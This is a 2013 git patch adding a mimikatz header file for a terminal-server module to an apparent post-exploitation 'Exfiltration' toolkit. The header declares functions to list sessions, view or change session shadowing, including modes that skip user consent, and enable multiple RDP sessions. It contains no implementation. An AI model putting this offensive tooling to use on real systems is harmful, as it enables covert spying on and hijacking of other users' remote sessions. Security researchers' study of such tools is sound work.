From 59cd18360764af6e6133ad11ec9cd8295372e587 Mon Sep 17 00:00:00 2001 From: clymb3r Date: Tue, 1 Oct 2013 09:47:05 -0700 Subject: Adding Invoke-Mimikatz and Invoke-Ninjacopy --- .../mimikatz/modules/mod_mimikatz_terminalserver.h | 55 ++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h') diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h new file mode 100644 index 0000000..5af9492 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h @@ -0,0 +1,55 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "globdefs.h" +#include "mod_ts.h" +#include "mod_process.h" +#include "mod_memory.h" +#include "mod_patch.h" +#include + +class mod_mimikatz_terminalserver +{ +public: + static vector getMimiKatzCommands(); + + static bool sessions(vector * arguments); + static bool processes(vector * arguments); + static bool viewshadow(vector * arguments); + static bool modifyshadow(vector * arguments); + static bool multirdp(vector * arguments); + +private: + static bool listAndOrModifySession(DWORD * id = NULL, DWORD * newState = NULL); + static wstring shadowToType(DWORD shadow); + static wstring stateToType(DWORD state); + + enum KIWI_SHADOW_TYPE { + SHADOW_DISABLE = 0, + SHADOW_INTERACT = 1, + SHADOW_INTERACT_NOASK = 2, + SHADOW_VIEW = 3, + SHADOW_VIEW_NOASK = 4 + }; + + typedef struct _KIWI_TS_SESSION { + PBYTE next; + PBYTE prev; + PBYTE unk1; + PBYTE refLock; + PBYTE unk2; + BYTE unk3[8]; + DWORD id; + wchar_t name[32+1]; + BYTE unk4[7434]; + wchar_t sname[32+1]; + wchar_t type[32+1]; + BYTE unk5[1684]; + DWORD shadow; + } KIWI_TS_SESSION, * PKIWI_TS_SESSION; + +}; + -- cgit v1.2.3